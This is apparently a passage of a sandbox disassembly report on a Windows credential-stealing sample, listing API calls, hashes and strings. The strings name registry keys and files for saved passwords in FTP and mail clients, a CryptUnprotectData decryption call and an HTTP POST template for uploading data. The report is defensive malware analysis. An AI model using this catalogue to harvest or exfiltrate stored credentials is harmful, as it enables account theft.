                                        • Opcode ID: e118c3bfb3773c56276887e609a15de6210c5a38b762f93b15efbbf9f375b10b
                                        • Instruction ID: 7e462e80501d9e5d3e76f56de11c39f25c7f68219fd9cfee39f09a4e9e0ed859
                                        • Opcode Fuzzy Hash: e118c3bfb3773c56276887e609a15de6210c5a38b762f93b15efbbf9f375b10b
                                        • Instruction Fuzzy Hash: 3851C331800118FADF217F51CC42BDDBAB9BF44304F50C1BAB549741B1DBBA5AA1AF99
                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99
                                        • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403CC4
                                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403D0A
                                        • wsprintfA.USER32 ref: 00403D2F
                                          • Part of subcall function 00403BF8: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D
                                        • lstrlenA.KERNEL32(?,00001000,00001000,00001000), ref: 00403D5A
                                        • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403DA5
                                        Strings
                                        • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403D27
                                        • <, xrefs: 00403CE4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlensetsockoptwsprintf
                                        • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                        • API String ID: 2761384797-2005047030
                                        • Opcode ID: 2b5b225140a011d5fa94f95724e4dc4ac8cdaac8ba449ec29ce0e43916d03e7f
                                        • Instruction ID: 5f7717a6d49742dac3458fc0ff4de133af0d4ec56afc4245b17f25aea9860e04
                                        • Opcode Fuzzy Hash: 2b5b225140a011d5fa94f95724e4dc4ac8cdaac8ba449ec29ce0e43916d03e7f
                                        • Instruction Fuzzy Hash: 9E41F631D00209AAEF11AFD1CC41BEEBE79AF44349F10843AF510B52A1D7B95A55DB19
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00405DA3
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405DD7
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F83
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumFreeLocalOpen
                                        • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                        • API String ID: 3369285772-3748300950
                                        • Opcode ID: 83de5721988879909b934d02520a36f5d7858ab19825fe1bb3338627fdf0edcf
                                        • Instruction ID: e43caad095013d876d34be9a6faa5c2b2fd077b182932feb9c9da737445d0b20
                                        • Opcode Fuzzy Hash: 83de5721988879909b934d02520a36f5d7858ab19825fe1bb3338627fdf0edcf
                                        • Instruction Fuzzy Hash: 2F41C53190011CFADF216B51CC42BDEBAB9BF44304F54C0BAB588741B1DB7A5B91AF98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D838
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D86C
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                        • API String ID: 1332880857-1017491782
                                        • Opcode ID: 1e42fff59c8a3401b25850b4d0928db3ef35e302ce7de35f2e1fb856f2bab282
                                        • Instruction ID: 7f90cfe9abbe02165084e32a3781de3c4f967995d5724fcc174d63018c37eba3
                                        • Opcode Fuzzy Hash: 1e42fff59c8a3401b25850b4d0928db3ef35e302ce7de35f2e1fb856f2bab282
                                        • Instruction Fuzzy Hash: 3B41857184011CFADF616F51CC42BDDBABABF04304F5085BAB548741B1DB7A9BA1AF88
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071F4
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407228
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                        • API String ID: 1332880857-980612798
                                        • Opcode ID: 1585345eb313946bb772afd6a6b819466d12c316f537d3ffd6071d42423cbd18
                                        • Instruction ID: ed69391d3fbf79e033e7c56e4dc8bf61ef94230e28ffe02a357feb34859d1007
                                        • Opcode Fuzzy Hash: 1585345eb313946bb772afd6a6b819466d12c316f537d3ffd6071d42423cbd18
                                        • Instruction Fuzzy Hash: 5A41C53184011CBADF226F51CC42BDD7ABABF04304F54C1BAB948741B1DBBA5B91AF99
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FC9
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406FFD
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040718F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Directory$Password$Server$UserName$_Password
                                        • API String ID: 1332880857-3317168126
                                        • Opcode ID: bfd9ca2203769a46a2ca111f1ad957b2d89285d5160d24b48c413b623b0ef977
                                        • Instruction ID: 470072a49d933337874d52f8a793f1173355220d0d1b0d4f5258c442bc1981ba
                                        • Opcode Fuzzy Hash: bfd9ca2203769a46a2ca111f1ad957b2d89285d5160d24b48c413b623b0ef977
                                        • Instruction Fuzzy Hash: 9941D63184011CBADF21AF51CC42BDD7ABABF04344F50C1BAB548781B1DBBA5B91AF89
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040603B
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040606F
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: HostDirName$HostName$Password$Port$Username
                                        • API String ID: 1332880857-791697221
                                        • Opcode ID: a99725a83c487bc8e2d7b84090dbb5d88620b78899b2350e36d391a34c80abf6
                                        • Instruction ID: cfe77a76412509250b23a064962b32b4b25aafbcdeaf94a349052579620f6679
                                        • Opcode Fuzzy Hash: a99725a83c487bc8e2d7b84090dbb5d88620b78899b2350e36d391a34c80abf6
                                        • Instruction Fuzzy Hash: 0341A63184021CFADF217B51CC42BDCBAB9BF44304F50C1BAB559741B1DABA5BA19F88
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D401
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D435
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D5B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: Host$Pass$Port$Remote Dir$User
                                        • API String ID: 1332880857-1775099961
                                        • Opcode ID: 15fbf8702d2262ea6b65a1f7a3ed68f4eba4029672a7cee81137440431dfb4c8
                                        • Instruction ID: b4805bd7242b00b9ddf519bb23b1881e1ba85106e2876bb940d828b3e0396e8b
                                        • Opcode Fuzzy Hash: 15fbf8702d2262ea6b65a1f7a3ed68f4eba4029672a7cee81137440431dfb4c8
                                        • Instruction Fuzzy Hash: 7B41B331940118BADF227F51CD42FDCBAB6BF04304F5081BAB548740B1DA7A9BA5AF98
                                        APIs
                                        • StrStrIA.SHLWAPI(011B3E08,BlazeFtp), ref: 0040C675
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                          • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                          • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                        • API String ID: 1884169789-2976447346
                                        • Opcode ID: 30673b7a28d785bc35bf7ecb67ccfe8c9ea75d26ea471e2f5f6ae481b17fd086
                                        • Instruction ID: 7dfc812850a862069b058b435ff72f01b7f8ab457aeaeeeaad88e161e10fa145
                                        • Opcode Fuzzy Hash: 30673b7a28d785bc35bf7ecb67ccfe8c9ea75d26ea471e2f5f6ae481b17fd086
                                        • Instruction Fuzzy Hash: 8131F731940209FADF126FA1CC82FADBE72AF40744F60453AB910751F1D7BA9AA19B4C
                                        APIs
                                        • StrStrIA.SHLWAPI(011B3E08,CUTEFTP), ref: 0040522B
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                          • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                          • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        • CUTEFTP, xrefs: 00405225
                                        • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 004052AF
                                        • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405295
                                        • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 004052C9
                                        • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 004052BC
                                        • \sm.dat, xrefs: 0040523F
                                        • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405288
                                        • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 004052A2
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                                        • API String ID: 1884169789-2738976122
                                        • Opcode ID: 864fb766d5452e4e715f3483f269fcc451a76ac5c4caa4ee8c2e46c1c57938e4
                                        • Instruction ID: fb6da6a212dba04d11d560339f4344d71db33ae972742514da326522fc35cba6
                                        • Opcode Fuzzy Hash: 864fb766d5452e4e715f3483f269fcc451a76ac5c4caa4ee8c2e46c1c57938e4
                                        • Instruction Fuzzy Hash: CF114D70644509BADB113F21CC02FDE3E22AF94744F10407ABA15781E2DBB98AA1AE5C
                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403941
                                        • lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403952
                                        • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403973
                                        • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040398A
                                        • lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040399B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocLocal
                                        • String ID: Content-Length:$Location:
                                        • API String ID: 2140729754-2400408565
                                        • Opcode ID: e8ffa94ce4d694b39019d19632f52d281a77e285f97d3380fae7b04970062dbb
                                        • Instruction ID: d13be5a898ef7c92ffe78318898a519c71413f556bb4f1564f50c54def6c2146
                                        • Opcode Fuzzy Hash: e8ffa94ce4d694b39019d19632f52d281a77e285f97d3380fae7b04970062dbb
                                        • Instruction Fuzzy Hash: AC41B431F00149BBDB10AFA5DC45B9EFF69EF81308F208177B410B62E1DBB99A419B58
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B9F
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406BD3
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D74
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumFreeLocalOpen
                                        • String ID: Hostname$Password$Port$Username
                                        • API String ID: 3369285772-1811172798
                                        • Opcode ID: 70b3e5b315c4ec5d603e8bdfdf498d26a0901d80f443dcd0a952730f8badb1d1
                                        • Instruction ID: 9e560bf20e253cf620f0bf8f58e9f66f6026772323493f30a14cac2fd15d173a
                                        • Opcode Fuzzy Hash: 70b3e5b315c4ec5d603e8bdfdf498d26a0901d80f443dcd0a952730f8badb1d1
                                        • Instruction Fuzzy Hash: 0C41F57190011CFADF21AB51CC42BDDBAB9BF04304F54C0BAB189740B1DB799BA19F99
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040696B
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040699F
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B14
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumFreeLocalOpen
                                        • String ID: FtpPort$Password$Server$Username
                                        • API String ID: 3369285772-1828875246
                                        • Opcode ID: 78d8da263ec6a7853f817fc27451247fb88eb8edebb598097162be4fc9f44837
                                        • Instruction ID: c2799d5aff4dbc27275e197c9ccfa65bb5614a60f107031a19e96ed6569a589d
                                        • Opcode Fuzzy Hash: 78d8da263ec6a7853f817fc27451247fb88eb8edebb598097162be4fc9f44837
                                        • Instruction Fuzzy Hash: 5541C47190021CFADF217F51CC42BDDBAB9BF44304F50C0BAB149B41A1DAB95BA1AF99
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E072
                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E1A2
                                          • Part of subcall function 0040421D: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
                                          • Part of subcall function 0040421D: LocalFree.KERNEL32(00000000), ref: 0040429D
                                          • Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                                        • String ID: Folder$Port$Site$UserID$xflags
                                        • API String ID: 2167297517-269738940
                                        • Opcode ID: bedebaca43ca7a6652ba1ecd1ba44a3ebdb93cf312a1c3972445144c686f53ca
                                        • Instruction ID: 99f8a596b935f939f04ef1e9f78ab754f846f32f70ebc26a21a53360edf03044
                                        • Opcode Fuzzy Hash: bedebaca43ca7a6652ba1ecd1ba44a3ebdb93cf312a1c3972445144c686f53ca
                                        • Instruction Fuzzy Hash: FE318435900109BADF126F92CC42FEEBB76AF04704F50853BB551781F1D77A9A61EB48
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407715
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407749
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407864
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                        • API String ID: 1332880857-3870687875
                                        • Opcode ID: 7995c359595dec44803303d7f3979889ab6045d4bd9c4574d5891e1607afd5bf
                                        • Instruction ID: 41f403c1f211ac345a20322eebd65043438107ad4896e838d52a6925644287e4
                                        • Opcode Fuzzy Hash: 7995c359595dec44803303d7f3979889ab6045d4bd9c4574d5891e1607afd5bf
                                        • Instruction Fuzzy Hash: 3431063190021CFADF216F51CC46BDDBBBABF44304F50C4BAB248751A1DBB96A919F89
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F678
                                          • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                          • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                          • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                          • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F6BD
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F6D8
                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F71D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                        • API String ID: 3062143572-138716004
                                        • Opcode ID: 4bf2e9daa6d2bf96a05ab6535975067cc3f3b5851bf6d91f7f349740728dac14
                                        • Instruction ID: 47e9b67bc361ea01282804338548f8079bf12a9657f3d13f5ec0334aac9f44a8
                                        • Opcode Fuzzy Hash: 4bf2e9daa6d2bf96a05ab6535975067cc3f3b5851bf6d91f7f349740728dac14
                                        • Instruction Fuzzy Hash: 03112130684208BACB11AF62CC47FDD7A799B04748F60C0A6B709750E2D6F98AD19B8D
                                        APIs
                                        • StrStrA.SHLWAPI(011B3E08,unleap.exe), ref: 004078EB
                                        • lstrlenA.KERNEL32(unleap.exe,00000001,011B3E08,unleap.exe), ref: 00407904
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                          • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                          • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        • StrStrIA.SHLWAPI(011B4128,leapftp,011B3E08,unleap.exe), ref: 00407948
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                                        • API String ID: 1884169789-1497043051
                                        • Opcode ID: 1975db484a2edb572d663d077a455cdba8d55228f2557e343ac24274fa8b9c54
                                        • Instruction ID: 373240b88979ee386ccafce9dc28ec783677a3504280557004698e1610f7e861
                                        • Opcode Fuzzy Hash: 1975db484a2edb572d663d077a455cdba8d55228f2557e343ac24274fa8b9c54
                                        • Instruction Fuzzy Hash: C0218471604204B9EB113B61CC06FEA7E1ADB80354F20843BB901B51E2D7BD5DD196AD
                                        APIs
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        • wsprintfA.USER32 ref: 0040EE6C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocalwsprintf
                                        • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                        • API String ID: 988369812-1921698578
                                        • Opcode ID: 550b5b3f0fdeb7335a23ebea4e6ed46425c412b6e63f0c220556618304f09542
                                        • Instruction ID: 3c6a3ae991e9433a380ac533950602d6b06fd5a2449390ce6c15b7b471f88e49
                                        • Opcode Fuzzy Hash: 550b5b3f0fdeb7335a23ebea4e6ed46425c412b6e63f0c220556618304f09542
                                        • Instruction Fuzzy Hash: 4031F735E0020CFADF01ABA2DD42ADE7B76EF04344F60897BB410B51E1D7799B60AB48
                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404ABC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocDirectoryLocalWindows
                                        • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                        • API String ID: 3186838798-3636168975
                                        • Opcode ID: 92d519d9047ebb2fe0f84cdf8960490e0faba2c40265d55597503f581986c5a0
                                        • Instruction ID: 20f451b4e4197748d70b317d5a710515d99f39502e28a1532faddfeb6e84537c
                                        • Opcode Fuzzy Hash: 92d519d9047ebb2fe0f84cdf8960490e0faba2c40265d55597503f581986c5a0
                                        • Instruction Fuzzy Hash: 9441D0B0E80609BAEF123B61CC43FDD7E259F80754F20417BBA14B40F6DABD9A519A5C
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404772
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004047A6
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004048CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: HostName$Password$User
                                        • API String ID: 1332880857-1253078594
                                        • Opcode ID: 8ec461a1a81bc7ef45ee7558dd0ab108554fe709a5a8f809842cd8894194971f
                                        • Instruction ID: 274a7ee69c92ba69b68534aa4b7c6f7a3064639cd42e7684e15c5da6ae9acadd
                                        • Opcode Fuzzy Hash: 8ec461a1a81bc7ef45ee7558dd0ab108554fe709a5a8f809842cd8894194971f
                                        • Instruction Fuzzy Hash: F731D67584011CBADF217B51CC42BDDBAB9BF40304F50C5BAB644751B1CBB95B929F88
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C8E
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                        • API String ID: 1332880857-3184955129
                                        • Opcode ID: 9120772f693959893bd55fbdc736b9a95cce8a02e990c7d9ff4710f1ec01c8f3
